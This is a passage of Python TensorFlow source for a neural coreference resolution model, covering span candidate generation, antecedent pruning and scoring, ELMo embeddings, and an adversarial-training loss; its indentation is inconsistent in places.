    gradients = tf.gradients(self.loss * 0.6 + self.ad_loss * 0.4, trainable_params)
    gradients, _ = tf.clip_by_global_norm(gradients, self.config["max_gradient_norm"])
    optimizers = {
        "adam": tf.train.AdamOptimizer,
        "sgd": tf.train.GradientDescentOptimizer
    }
    optimizer = optimizers[self.config["optimizer"]](learning_rate)
    self.train_op = optimizer.apply_gradients(zip(gradients, trainable_params), global_step=self.global_step)
def start_enqueue_thread(self, session):
with open(self.config["train_path"]) as f:
train_examples = [json.loads(jsonline) for jsonline in f.readlines()]
def _enqueue_loop():
while True:
random.shuffle(train_examples)
for example in train_examples:
tensorized_example = self.tensorize_example(example, is_training=True)
feed_dict = dict(zip(self.queue_input_tensors, tensorized_example))
session.run(self.enqueue_op, feed_dict=feed_dict)
enqueue_thread = threading.Thread(target=_enqueue_loop)
enqueue_thread.daemon = True
enqueue_thread.start()
def restore(self, session):
# Don't try to restore unused variables from the TF-Hub ELMo module.
vars_to_restore = [v for v in tf.global_variables() if "module/" not in v.name]
saver = tf.train.Saver(vars_to_restore)
# checkpoint_path = os.path.join(self.config["log_dir"], "model.max.ckpt")
checkpoint_path = os.path.join(self.config["log_dir"], "model-4500")
print("Restoring from {}".format(checkpoint_path))
session.run(tf.global_variables_initializer())
saver.restore(session, checkpoint_path)
def load_lm_embeddings(self, doc_key):
if self.lm_file is None:
return np.zeros([0, 0, self.lm_size, self.lm_layers])
file_key = doc_key.replace("/", ":")
group = self.lm_file[file_key]
num_sentences = len(list(group.keys()))
sentences = [group[str(i)][...] for i in range(num_sentences)]
lm_emb = np.zeros([num_sentences, max(s.shape[0] for s in sentences), self.lm_size, self.lm_layers])
for i, s in enumerate(sentences):
lm_emb[i, :s.shape[0], :, :] = s
return lm_emb
def sentence_start_end_index(self, sentences):
"""
:param sentences: sentences list example: [['i', 'like'], ['cat']]
:return: sentences start list and end list just like start:[0, 2], end:[1, 2]
"""
start_l, end_l = [], []
offset = -1
for sentence in sentences:
start_ = offset + 1
end_ = len(sentence) + offset
try:
if sentence[0] == '[' and NUM.match(sentence[1]) and sentence[2] == ']':
start_ = start_ + 3
finally:
offset = offset + len(sentence)
if abs(end_ - start_ + 1) > 30:
start_l.append(start_)
end_l.append(end_)
assert len(start_l) == len(end_l)
return np.array(start_l), np.array(end_l)
def tensorize_mentions(self, mentions):
if len(mentions) > 0:
starts, ends = zip(*mentions)
else:
starts, ends = [], []
return np.array(starts), np.array(ends)
def tensorize_span_labels(self, tuples, label_dict):
if len(tuples) > 0:
starts, ends, labels = zip(*tuples)
else:
starts, ends, labels = [], [], []
return np.array(starts), np.array(ends), np.array([label_dict[c] for c in labels])
    def tensorize_example(self, example, is_training):
        """Convert one JSON example into the tuple of numpy tensors fed to the queue.

        The returned tuple order must match the `input_props` declared in __init__:
        (tokens, context_word_emb, head_word_emb, lm_emb, char_index, text_len,
        speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids,
        sentence_index_start, sentence_index_end).
        """
        clusters = example["clusters"]
        # Deduplicate and sort all gold mentions across clusters; index each one.
        gold_mentions = sorted(tuple(m) for m in util.flatten(clusters))
        gold_mention_map = {m: i for i, m in enumerate(gold_mentions)}
        # cluster_ids[i] is the 1-based cluster id of gold mention i (0 would mean "none").
        cluster_ids = np.zeros(len(gold_mentions))
        for cluster_id, cluster in enumerate(clusters):
            for mention in cluster:
                cluster_ids[gold_mention_map[tuple(mention)]] = cluster_id + 1
        sentences = example["sentences"]
        num_words = sum(len(s) for s in sentences)
        speakers = util.flatten(example["speakers"])
        assert num_words == len(speakers)
        max_sentence_length = max(len(s) for s in sentences)
        # Word length must at least cover the widest CNN filter.
        max_word_length = max(max(max(len(w) for w in s) for s in sentences), max(self.config["filter_widths"]))
        text_len = np.array([len(s) for s in sentences])
        tokens = [[""] * max_sentence_length for _ in sentences]
        context_word_emb = np.zeros([len(sentences), max_sentence_length, self.context_embeddings.size])
        head_word_emb = np.zeros([len(sentences), max_sentence_length, self.head_embeddings.size])
        char_index = np.zeros([len(sentences), max_sentence_length, max_word_length])
        # Fill padded [sentence, word] grids with pretrained word vectors and char ids.
        for i, sentence in enumerate(sentences):
            for j, word in enumerate(sentence):
                tokens[i][j] = word
                context_word_emb[i, j] = self.context_embeddings[word]
                head_word_emb[i, j] = self.head_embeddings[word]
                char_index[i, j, :len(word)] = [self.char_dict[c] for c in word]
        tokens = np.array(tokens)
        # NOTE(review): speaker ids come from iterating a set, so the numbering is not
        # stable across runs — only equality between ids matters downstream.
        speaker_dict = {s: i for i, s in enumerate(set(speakers))}
        speaker_ids = np.array([speaker_dict[s] for s in speakers])
        doc_key = example["doc_key"]
        # Genre is encoded in the first two characters of the document key.
        genre = self.genres[doc_key[:2]]
        gold_starts, gold_ends = self.tensorize_mentions(gold_mentions)
        sentence_index_start, sentence_index_end = self.sentence_start_end_index(sentences)
        lm_emb = self.load_lm_embeddings(doc_key)
        example_tensors = (tokens, context_word_emb, head_word_emb, lm_emb, char_index, text_len, speaker_ids, genre, is_training,
                           gold_starts, gold_ends, cluster_ids, sentence_index_start, sentence_index_end)
        # Long documents are randomly cropped during training to bound memory use.
        if is_training and len(sentences) > self.config["max_training_sentences"]:
            return self.truncate_example(*example_tensors)
        else:
            return example_tensors
def truncate_example(self, tokens, context_word_emb, head_word_emb, lm_emb, char_index, text_len, speaker_ids,
genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_index_start,
sentence_index_end):
max_training_sentences = self.config["max_training_sentences"]
num_sentences = context_word_emb.shape[0]
assert num_sentences > max_training_sentences
sentence_offset = random.randint(0, num_sentences - max_training_sentences)
word_offset = text_len[:sentence_offset].sum()
num_words = text_len[sentence_offset:sentence_offset + max_training_sentences].sum()
tokens = tokens[sentence_offset:sentence_offset + max_training_sentences, :]
context_word_emb = context_word_emb[sentence_offset:sentence_offset + max_training_sentences, :, :]
head_word_emb = head_word_emb[sentence_offset:sentence_offset + max_training_sentences, :, :]
lm_emb = lm_emb[sentence_offset:sentence_offset + max_training_sentences, :, :, :]
char_index = char_index[sentence_offset:sentence_offset + max_training_sentences, :, :]
text_len = text_len[sentence_offset:sentence_offset + max_training_sentences]
speaker_ids = speaker_ids[word_offset: word_offset + num_words]
gold_spans = np.logical_and(gold_ends >= word_offset, gold_starts < word_offset + num_words)
gold_starts = gold_starts[gold_spans] - word_offset
gold_ends = gold_ends[gold_spans] - word_offset
"""i want to get sentence start and end index
"""
sentence_spans = np.logical_and(sentence_index_end >= word_offset,
sentence_index_start < word_offset + num_words)
sentence_index_start = sentence_index_start[sentence_spans] - word_offset
sentence_index_end = sentence_index_end[sentence_spans] - word_offset
cluster_ids = cluster_ids[gold_spans]
return tokens, context_word_emb, head_word_emb, lm_emb, char_index, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_index_start, sentence_index_end
def get_candidate_labels(self, candidate_starts, candidate_ends, labeled_starts, labeled_ends, labels):
same_start = tf.equal(tf.expand_dims(labeled_starts, 1),
tf.expand_dims(candidate_starts, 0)) # [num_labeled, num_candidates]
same_end = tf.equal(tf.expand_dims(labeled_ends, 1),
tf.expand_dims(candidate_ends, 0)) # [num_labeled, num_candidates]
same_span = tf.logical_and(same_start, same_end) # [num_labeled, num_candidates]
candidate_labels = tf.matmul(tf.expand_dims(labels, 0), tf.to_int32(same_span)) # [1, num_candidates]
candidate_labels = tf.squeeze(candidate_labels, 0) # [num_candidates]
return candidate_labels
def get_dropout(self, dropout_rate, is_training):
return 1 - (tf.to_float(is_training) * dropout_rate)
    def coarse_to_fine_pruning(self, top_span_emb, top_span_mention_scores, c):
        """For each of the k top spans, keep the c highest-scoring candidate antecedents.

        Antecedent candidates are strictly earlier spans (offset >= 1). Scoring here
        uses only the cheap terms (mention scores + a bilinear term), pruning the
        pairs before the expensive slow-scoring FFNN runs.
        """
        k = util.shape(top_span_emb, 0)
        top_span_range = tf.range(k)  # [k]
        antecedent_offsets = tf.expand_dims(top_span_range, 1) - tf.expand_dims(top_span_range, 0)  # [k, k]
        antecedents_mask = antecedent_offsets >= 1  # [k, k]; only strictly earlier spans are valid
        fast_antecedent_scores = tf.expand_dims(top_span_mention_scores, 1) + tf.expand_dims(top_span_mention_scores,
                                                                                             0)  # [k, k]
        # log(0) = -inf excludes masked pairs from the subsequent top_k.
        fast_antecedent_scores += tf.log(tf.to_float(antecedents_mask))  # [k, k]
        fast_antecedent_scores += self.get_fast_antecedent_scores(top_span_emb)  # [k, k]
        _, top_antecedents = tf.nn.top_k(fast_antecedent_scores, c, sorted=False)  # [k, c]
        top_antecedents_mask = util.batch_gather(antecedents_mask, top_antecedents)  # [k, c]
        top_fast_antecedent_scores = util.batch_gather(fast_antecedent_scores, top_antecedents)  # [k, c]
        top_antecedent_offsets = util.batch_gather(antecedent_offsets, top_antecedents)  # [k, c]
        return top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets
    def distance_pruning(self, top_span_emb, top_span_mention_scores, c):
        """Fallback pruning: each span's candidate antecedents are simply the c spans
        immediately preceding it.

        Spans near the document start (fewer than c predecessors) get out-of-range
        indices clamped to 0 and masked out via the log-mask below.
        """
        k = util.shape(top_span_emb, 0)
        top_antecedent_offsets = tf.tile(tf.expand_dims(tf.range(c) + 1, 0), [k, 1])  # [k, c]
        raw_top_antecedents = tf.expand_dims(tf.range(k), 1) - top_antecedent_offsets  # [k, c]
        top_antecedents_mask = raw_top_antecedents >= 0  # [k, c]
        top_antecedents = tf.maximum(raw_top_antecedents, 0)  # [k, c]
        top_fast_antecedent_scores = tf.expand_dims(top_span_mention_scores, 1) + tf.gather(top_span_mention_scores,
                                                                                            top_antecedents)  # [k, c]
        # log(0) = -inf removes clamped (invalid) antecedents from later softmaxes.
        top_fast_antecedent_scores += tf.log(tf.to_float(top_antecedents_mask))  # [k, c]
        return top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets
    def get_predictions_and_loss(self, tokens, context_word_emb, head_word_emb, lm_emb, char_index, text_len,
                                 speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids,
                                 sentence_index_start, sentence_index_end):
        """Build the full coreference graph: token embeddings -> span candidates ->
        antecedent pruning -> antecedent scoring -> marginal log-likelihood loss.

        Returns (predictions, loss, top_list): predictions feed evaluation, loss is a
        scalar, and top_list carries the tensors re-used by adversarial_loss.
        """
        self.dropout = self.get_dropout(self.config["dropout_rate"], is_training)
        self.lexical_dropout = self.get_dropout(self.config["lexical_dropout_rate"], is_training)
        self.lstm_dropout = self.get_dropout(self.config["lstm_dropout_rate"], is_training)
        num_sentences = tf.shape(context_word_emb)[0]
        max_sentence_length = tf.shape(context_word_emb)[1]
        context_emb_list = [context_word_emb]
        head_emb_list = [head_word_emb]
        if self.config["char_embedding_size"] > 0:
            # Character-CNN embeddings, appended to both context and head representations.
            char_emb = tf.gather(
                tf.get_variable("char_embeddings", [len(self.char_dict), self.config["char_embedding_size"]]),
                char_index)  # [num_sentences, max_sentence_length, max_word_length, emb]
            flattened_char_emb = tf.reshape(char_emb, [num_sentences * max_sentence_length, util.shape(char_emb, 2),
                                                       util.shape(char_emb,
                                                                  3)])  # [num_sentences * max_sentence_length, max_word_length, emb]
            flattened_aggregated_char_emb = util.cnn(flattened_char_emb, self.config["filter_widths"], self.config[
                "filter_size"])  # [num_sentences * max_sentence_length, emb]
            aggregated_char_emb = tf.reshape(flattened_aggregated_char_emb, [num_sentences, max_sentence_length,
                                                                             util.shape(flattened_aggregated_char_emb,
                                                                                        1)])  # [num_sentences, max_sentence_length, emb]
            context_emb_list.append(aggregated_char_emb)
            head_emb_list.append(aggregated_char_emb)
        if not self.lm_file:
            # No precomputed LM cache: run ELMo from TF-Hub inside the graph instead.
            elmo_module = hub.Module("https://tfhub.dev/google/elmo/2")
            lm_embeddings = elmo_module(
                inputs={"tokens": tokens, "sequence_len": text_len},
                signature="tokens", as_dict=True)
            word_emb = lm_embeddings["word_emb"]  # [num_sentences, max_sentence_length, 512]
            lm_emb = tf.stack([tf.concat([word_emb, word_emb], -1),
                               lm_embeddings["lstm_outputs1"],
                               lm_embeddings["lstm_outputs2"]], -1)  # [num_sentences, max_sentence_length, 1024, 3]
        lm_emb_size = util.shape(lm_emb, 2)
        lm_num_layers = util.shape(lm_emb, 3)
        with tf.variable_scope("lm_aggregation"):
            # Learned softmax-weighted mix of the ELMo layers, plus a global scalar scale.
            self.lm_weights = tf.nn.softmax(
                tf.get_variable("lm_scores", [lm_num_layers], initializer=tf.constant_initializer(0.0)))
            self.lm_scaling = tf.get_variable("lm_scaling", [], initializer=tf.constant_initializer(1.0))
        flattened_lm_emb = tf.reshape(lm_emb, [num_sentences * max_sentence_length * lm_emb_size, lm_num_layers])
        flattened_aggregated_lm_emb = tf.matmul(flattened_lm_emb, tf.expand_dims(self.lm_weights,
                                                                                 1))  # [num_sentences * max_sentence_length * emb, 1]
        aggregated_lm_emb = tf.reshape(flattened_aggregated_lm_emb, [num_sentences, max_sentence_length, lm_emb_size])
        aggregated_lm_emb *= self.lm_scaling
        context_emb_list.append(aggregated_lm_emb)
        context_emb = tf.concat(context_emb_list, 2)  # [num_sentences, max_sentence_length, emb]
        head_emb = tf.concat(head_emb_list, 2)  # [num_sentences, max_sentence_length, emb]
        context_emb = tf.nn.dropout(context_emb, self.lexical_dropout)  # [num_sentences, max_sentence_length, emb]
        head_emb = tf.nn.dropout(head_emb, self.lexical_dropout)  # [num_sentences, max_sentence_length, emb]
        """ get context embedding with glove 300 and 50, the 300 dimension embedding use to concatenate char embedding and other
        feature embedding. And the 50 dimension embedding with glove_300d_2w use to compute attention. They are encoding with
        context.
        1. context whole embedding equal language model elmo get token embedding(aggregated_lm_emb) concatenate char embedding
        concatenate glove(300 dimension word2vec embedding).
           shape: [num_sentences, max_sentence_length, emb]
        2. head_emb equal glove(50 dimension word2vec embedding concatenate char embedding)
           shape: [num_sentences, max_sentence_length, emb]
        """
        text_len_mask = tf.sequence_mask(text_len, maxlen=max_sentence_length)  # [num_sentence, max_sentence_length]
        context_outputs = self.lstm_contextualize(context_emb, text_len, text_len_mask)  # [num_words, emb]
        """Used context lstm encoder
        input: context whole embedding
        output: context_output
        shape: [num_sentences * max_sentence_length, emb]
        """
        num_words = util.shape(context_outputs, 0)
        genre_emb = tf.gather(tf.get_variable("genre_embeddings", [len(self.genres), self.config["feature_size"]]),
                              genre)  # [emb]
        sentence_indices = tf.tile(tf.expand_dims(tf.range(num_sentences), 1),
                                   [1, max_sentence_length])  # [num_sentences, max_sentence_length]
        flattened_sentence_indices = self.flatten_emb_by_sentence(sentence_indices, text_len_mask)  # [num_words]
        flattened_head_emb = self.flatten_emb_by_sentence(head_emb, text_len_mask)  # [num_words]
        # Enumerate every span up to max_span_width starting at each word position.
        candidate_starts = tf.tile(tf.expand_dims(tf.range(num_words), 1),
                                   [1, self.max_span_width])  # [num_words, max_span_width]
        candidate_ends = candidate_starts + tf.expand_dims(tf.range(self.max_span_width),
                                                           0)  # [num_words, max_span_width]
        """ add sentence candidate starts and candidate ends in this place. and padding max_span_width to max_sentence_len.
        sentence_indices not used in this model input
        """
        candidate_start_sentence_indices = tf.gather(flattened_sentence_indices,
                                                     candidate_starts)  # [num_words, max_span_width]
        candidate_end_sentence_indices = tf.gather(flattened_sentence_indices, tf.minimum(candidate_ends,
                                                                                          num_words - 1))  # [num_words, max_span_width]
        # A candidate is valid only if it stays inside the document and inside one sentence.
        candidate_mask = tf.logical_and(candidate_ends < num_words, tf.equal(candidate_start_sentence_indices,
                                                                             candidate_end_sentence_indices))  # [num_words, max_span_width]
        flattened_candidate_mask = tf.reshape(candidate_mask, [-1])  # [num_words * max_span_width]
        candidate_starts = tf.boolean_mask(tf.reshape(candidate_starts, [-1]),
                                           flattened_candidate_mask)  # [num_candidates]
        candidate_ends = tf.boolean_mask(tf.reshape(candidate_ends, [-1]), flattened_candidate_mask)  # [num_candidates]
        candidate_sentence_indices = tf.boolean_mask(tf.reshape(candidate_start_sentence_indices, [-1]),
                                                     flattened_candidate_mask)  # [num_candidates]
        """this is my change in input queue, add sentence_index start and end in candidate. we want to add sentence level
        span candidate.
        """
        candidate_starts = tf.concat([candidate_starts, sentence_index_start], axis=0)
        candidate_ends = tf.concat([candidate_ends, sentence_index_end], axis=0)
        """think of use padding to change the span embedding dimention in this place.
        candidate_cluster_ids compare between candidate and gold mention,example second
        candidate is true, candidate_cluster_ids just like: [0, 1, 0]
        """
        candidate_cluster_ids = self.get_candidate_labels(candidate_starts, candidate_ends, gold_starts, gold_ends,
                                                          cluster_ids)  # [num_candidates]
        candidate_span_emb = self.get_span_emb(flattened_head_emb, context_outputs, candidate_starts,
                                               candidate_ends)  # [num_candidates, emb]
        candidate_mention_scores = self.get_mention_scores(candidate_span_emb)  # [k, 1]
        candidate_mention_scores = tf.squeeze(candidate_mention_scores, 1)  # [k]
        # Keep the top fraction of spans by mention score (non-crossing, via the custom op).
        k = tf.to_int32(tf.floor(tf.to_float(tf.shape(context_outputs)[0]) * self.config["top_span_ratio"]))
        top_span_indices = coref_ops.extract_spans(tf.expand_dims(candidate_mention_scores, 0),
                                                   tf.expand_dims(candidate_starts, 0),
                                                   tf.expand_dims(candidate_ends, 0),
                                                   tf.expand_dims(k, 0),
                                                   util.shape(context_outputs, 0),
                                                   True)  # [1, k]
        top_span_indices.set_shape([1, None])
        top_span_indices = tf.squeeze(top_span_indices, 0)  # [k]
        top_span_starts = tf.gather(candidate_starts, top_span_indices)  # [k]
        top_span_ends = tf.gather(candidate_ends, top_span_indices)  # [k]
        top_span_emb = tf.gather(candidate_span_emb, top_span_indices)  # [k, emb]
        top_span_cluster_ids = tf.gather(candidate_cluster_ids, top_span_indices)  # [k]
        top_span_mention_scores = tf.gather(candidate_mention_scores, top_span_indices)  # [k]
        top_span_sentence_indices = tf.gather(candidate_sentence_indices, top_span_indices)  # [k]
        top_span_speaker_ids = tf.gather(speaker_ids, top_span_starts)  # [k]
        c = tf.minimum(self.config["max_top_antecedents"], k)
        """Stage 1 competed: k candidate mentions.
        """
        if self.config["coarse_to_fine"]:
            top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets = self.coarse_to_fine_pruning(
                top_span_emb, top_span_mention_scores, c)
        else:
            top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets = self.distance_pruning(
                top_span_emb, top_span_mention_scores, c)
        """Stage 2 competed: get each of k mensions c antecedents
        shape: [k, c]
        """
        dummy_scores = tf.zeros([k, 1])  # [k, 1]
        # Iteratively refine span embeddings via attention over predicted antecedents.
        for i in range(self.config["coref_depth"]):
            with tf.variable_scope("coref_layer", reuse=(i > 0)):
                top_antecedent_emb = tf.gather(top_span_emb, top_antecedents)  # [k, c, emb]
                top_antecedent_scores = top_fast_antecedent_scores + self.get_slow_antecedent_scores(top_span_emb,
                                                                                                    top_antecedents,
                                                                                                    top_antecedent_emb,
                                                                                                    top_antecedent_offsets,
                                                                                                    top_span_speaker_ids,
                                                                                                    genre_emb)  # [k, c]
                top_antecedent_weights = tf.nn.softmax(
                    tf.concat([dummy_scores, top_antecedent_scores], 1))  # [k, c + 1]
                top_antecedent_emb = tf.concat([tf.expand_dims(top_span_emb, 1), top_antecedent_emb],
                                               1)  # [k, c + 1, emb]
                attended_span_emb = tf.reduce_sum(tf.expand_dims(top_antecedent_weights, 2) * top_antecedent_emb,
                                                  1)  # [k, emb]
                with tf.variable_scope("f"):
                    f = tf.sigmoid(util.projection(tf.concat([top_span_emb, attended_span_emb], 1),
                                                   util.shape(top_span_emb, -1)))  # [k, emb]
                    top_span_emb = f * attended_span_emb + (1 - f) * top_span_emb  # [k, emb]
        """Stage 3 used original paper section 3 function: the antecedent and top_span composed a pairs (coref entity, demonstraction
        pronoun) and computer the pair of score s(gi, gj), s(gi, gj) = top_fast_antecedent_scores + get_slow_antecdents, via softmax,
        get the weights of each k span's (c + 1) antecedents weight. P(yi), yi is i mention in top_span. This is a attention mechanism
        get a new embedding ai, ai are calculate by attention mechanism. And then concatenate ai and gi. matmul W and via sigmoid to
        get a gatekeeper(fi). Finally, gi_final = fi * gi + (1 - fi) * ai.
        shape: [k, emb]
        """
        top_antecedent_scores = tf.concat([dummy_scores, top_antecedent_scores], 1)  # [k, c + 1]
        top_antecedent_cluster_ids = tf.gather(top_span_cluster_ids, top_antecedents)  # [k, c]
        # log(0) = -inf turns masked antecedents' cluster ids into an impossible value.
        top_antecedent_cluster_ids += tf.to_int32(tf.log(tf.to_float(top_antecedents_mask)))  # [k, c]
        same_cluster_indicator = tf.equal(top_antecedent_cluster_ids, tf.expand_dims(top_span_cluster_ids, 1))  # [k, c]
        non_dummy_indicator = tf.expand_dims(top_span_cluster_ids > 0, 1)  # [k, 1]
        pairwise_labels = tf.logical_and(same_cluster_indicator, non_dummy_indicator)  # [k, c]
        # The dummy is correct exactly when no real antecedent is correct.
        dummy_labels = tf.logical_not(tf.reduce_any(pairwise_labels, 1, keepdims=True))  # [k, 1]
        top_antecedent_labels = tf.concat([dummy_labels, pairwise_labels], 1)  # [k, c + 1]
        loss = self.softmax_loss(top_antecedent_scores, top_antecedent_labels)  # [k]
        """result of k antecedents's softmax loss.
        shape: [k]
        """
        loss = tf.reduce_sum(loss)  # []
        return [candidate_span_emb, candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends,
                top_antecedents, top_antecedent_scores], loss, [top_span_emb, top_span_cluster_ids, top_span_mention_scores, top_span_speaker_ids,
                genre_emb, k]
    def adversarial_loss(self, top_span_emb, top_span_cluster_ids, top_span_mention_scores, top_span_speaker_ids, genre_emb, k):
        """Re-run the antecedent scoring head on (perturbed) top-span embeddings.

        This is a copy of the pruning / scoring / loss tail of
        get_predictions_and_loss; __init__ calls it on a perturbed copy of the
        top-span embeddings for FGM-style adversarial training. Variable scopes
        ("coref_layer", "f", etc.) are re-entered, so it shares weights with the
        main graph under reuse semantics.
        """
        c = tf.minimum(self.config["max_top_antecedents"], k)
        """Stage 1 competed: k candidate mentions.
        """
        if self.config["coarse_to_fine"]:
            top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets = self.coarse_to_fine_pruning(
                top_span_emb, top_span_mention_scores, c)
        else:
            top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets = self.distance_pruning(
                top_span_emb, top_span_mention_scores, c)
        """Stage 2 competed: get each of k mensions c antecedents
        shape: [k, c]
        """
        dummy_scores = tf.zeros([k, 1])  # [k, 1]
        # Iteratively refine span embeddings via attention over predicted antecedents.
        for i in range(self.config["coref_depth"]):
            with tf.variable_scope("coref_layer", reuse=(i > 0)):
                top_antecedent_emb = tf.gather(top_span_emb, top_antecedents)  # [k, c, emb]
                top_antecedent_scores = top_fast_antecedent_scores + self.get_slow_antecedent_scores(top_span_emb,
                                                                                                    top_antecedents,
                                                                                                    top_antecedent_emb,
                                                                                                    top_antecedent_offsets,
                                                                                                    top_span_speaker_ids,
                                                                                                    genre_emb)  # [k, c]
                top_antecedent_weights = tf.nn.softmax(
                    tf.concat([dummy_scores, top_antecedent_scores], 1))  # [k, c + 1]
                top_antecedent_emb = tf.concat([tf.expand_dims(top_span_emb, 1), top_antecedent_emb],
                                               1)  # [k, c + 1, emb]
                attended_span_emb = tf.reduce_sum(tf.expand_dims(top_antecedent_weights, 2) * top_antecedent_emb,
                                                  1)  # [k, emb]
                with tf.variable_scope("f"):
                    f = tf.sigmoid(util.projection(tf.concat([top_span_emb, attended_span_emb], 1),
                                                   util.shape(top_span_emb, -1)))  # [k, emb]
                    top_span_emb = f * attended_span_emb + (1 - f) * top_span_emb  # [k, emb]
        """Stage 3 used original paper section 3 function: the antecedent and top_span composed a pairs (coref entity, demonstraction
        pronoun) and computer the pair of score s(gi, gj), s(gi, gj) = top_fast_antecedent_scores + get_slow_antecdents, via softmax,
        get the weights of each k span's (c + 1) antecedents weight. P(yi), yi is i mention in top_span. This is a attention mechanism
        get a new embedding ai, ai are calculate by attention mechanism. And then concatenate ai and gi. matmul W and via sigmoid to
        get a gatekeeper(fi). Finally, gi_final = fi * gi + (1 - fi) * ai.
        shape: [k, emb]
        """
        top_antecedent_scores = tf.concat([dummy_scores, top_antecedent_scores], 1)  # [k, c + 1]
        top_antecedent_cluster_ids = tf.gather(top_span_cluster_ids, top_antecedents)  # [k, c]
        top_antecedent_cluster_ids += tf.to_int32(tf.log(tf.to_float(top_antecedents_mask)))  # [k, c]
        same_cluster_indicator = tf.equal(top_antecedent_cluster_ids, tf.expand_dims(top_span_cluster_ids, 1))  # [k, c]
        non_dummy_indicator = tf.expand_dims(top_span_cluster_ids > 0, 1)  # [k, 1]
        pairwise_labels = tf.logical_and(same_cluster_indicator, non_dummy_indicator)  # [k, c]
        dummy_labels = tf.logical_not(tf.reduce_any(pairwise_labels, 1, keepdims=True))  # [k, 1]
        top_antecedent_labels = tf.concat([dummy_labels, pairwise_labels], 1)  # [k, c + 1]
        loss = self.softmax_loss(top_antecedent_scores, top_antecedent_labels)  # [k]
        """result of k antecedents's softmax loss.
        shape: [k]
        """
        loss = tf.reduce_sum(loss)  # []
        return loss
    def dget_span_emb(self, head_emb, context_outputs, span_starts, span_ends):
        """Build span embeddings: [start state; end state; width feature; head-attention sum].

        NOTE(review): nothing in this file calls `dget_span_emb` — the graph code calls
        `get_span_emb`. The `d` prefix and the "max_sentence_width" config key (where the
        commented-out variant below uses "max_span_width") suggest this is a renamed
        experimental copy; confirm which definition is live before editing behavior.
        """
        span_emb_list = []
        span_start_emb = tf.gather(context_outputs, span_starts)  # [k, emb]
        span_emb_list.append(span_start_emb)
        span_end_emb = tf.gather(context_outputs, span_ends)  # [k, emb]
        span_emb_list.append(span_end_emb)
        span_width = 1 + span_ends - span_starts  # [k]
        if self.config["use_features"]:
            # Learned embedding of the (clipped) span width.
            span_width_index = tf.minimum(self.config["max_sentence_width"] - 1, span_width - 1)  # [k]
            span_width_emb = tf.gather(tf.get_variable("span_width_embeddings", [self.config["max_sentence_width"],
                                                                                 self.config["feature_size"]]),
                                       span_width_index)  # [k, emb]
            span_width_emb = tf.nn.dropout(span_width_emb, self.dropout)
            span_emb_list.append(span_width_emb)
        """
        In this place, i want to padding the max_span len to compute head attention span embedding.
        """
        if self.config["model_heads"]:
            # Attention-weighted sum of head embeddings over the words inside the span.
            span_indices = tf.expand_dims(tf.range(self.config["max_sentence_width"]), 0) + tf.expand_dims(span_starts,
                                                                                                           1)  # [k, max_span_width]
            span_indices = tf.minimum(util.shape(context_outputs, 0) - 1, span_indices)  # [k, max_span_width]
            span_text_emb = tf.gather(head_emb, span_indices)  # [k, max_span_width, emb]
            with tf.variable_scope("head_scores"):
                self.head_scores = util.projection(context_outputs, 1)  # [num_words, 1]
            span_head_scores = tf.gather(self.head_scores, span_indices)  # [k, max_span_width, 1]
            # log(0) = -inf zeroes out positions beyond the span width after softmax.
            span_mask = tf.expand_dims(
                tf.sequence_mask(span_width, self.config["max_sentence_width"], dtype=tf.float32),
                2)  # [k, max_span_width, 1]
            span_head_scores += tf.log(span_mask)  # [k, max_span_width, 1]
            span_attention = tf.nn.softmax(span_head_scores, 1)  # [k, max_span_width, 1]
            span_head_emb = tf.reduce_sum(span_attention * span_text_emb, 1)  # [k, emb]
            span_emb_list.append(span_head_emb)
        # if self.config["model_heads"]:
        #     span_indices = tf.expand_dims(tf.range(self.config["max_span_width"]), 0) + tf.expand_dims(span_starts,
        #                                                                                                1)  # [k, max_span_width]
        #     span_indices = tf.minimum(util.shape(context_outputs, 0) - 1, span_indices)  # [k, max_span_width]
        #     span_text_emb = tf.gather(head_emb, span_indices)  # [k, max_span_width, emb]
        #
        #     with tf.variable_scope("head_scores"):
        #         self.head_scores = util.projection(context_outputs, 1)  # [num_words, 1]
        #     span_head_scores = tf.gather(self.head_scores, span_indices)  # [k, max_span_width, 1]
        #     span_mask = tf.expand_dims(tf.sequence_mask(span_width, self.config["max_span_width"], dtype=tf.float32), 2)  # [k, max_span_width, 1]
        #     span_head_scores += tf.log(span_mask)  # [k, max_span_width, 1]
        #     span_attention = tf.nn.softmax(span_head_scores, 1)  # [k, max_span_width, 1]
        #     span_head_emb = tf.reduce_sum(span_attention * span_text_emb, 1)  # [k, emb]
        #     span_emb_list.append(span_head_emb)
        span_emb = tf.concat(span_emb_list, 1)  # [k, emb]
        return span_emb  # [k, emb]
def get_mention_scores(self, span_emb):
with tf.variable_scope("mention_scores"):
return util.ffnn(span_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, 1]
def softmax_loss(self, antecedent_scores, antecedent_labels):
# print('antecedent_scores', antecedent_scores, antecedent_scores.shape)
# print('antecedent_label', antecedent_labels, antecedent_labels.shape)
gold_scores = antecedent_scores + tf.log(tf.to_float(antecedent_labels)) # [k, max_ant + 1]
marginalized_gold_scores = tf.reduce_logsumexp(gold_scores, [1]) # [k]
log_norm = tf.reduce_logsumexp(antecedent_scores, [1]) # [k]
# print('marginalized_gold_scores', marginalized_gold_scores)
# print('log_norm', log_norm)
return log_norm - marginalized_gold_scores # [k]
def bucket_distance(self, distances):
"""
Places the given values (designed for distances) into 10 semi-logscale buckets:
[0, 1, 2, 3, 4, 5-7, 8-15, 16-31, 32-63, 64+].
"""
logspace_idx = tf.to_int32(tf.floor(tf.log(tf.to_float(distances)) / math.log(2))) + 3
use_identity = tf.to_int32(distances <= 4)
combined_idx = use_identity * distances + (1 - use_identity) * logspace_idx
return tf.clip_by_value(combined_idx, 0, 9)
# return tf.clip_by_value(combined_idx, 0, 12) # 256+
    def get_slow_antecedent_scores(self, top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets,
                                   top_span_speaker_ids, genre_emb):
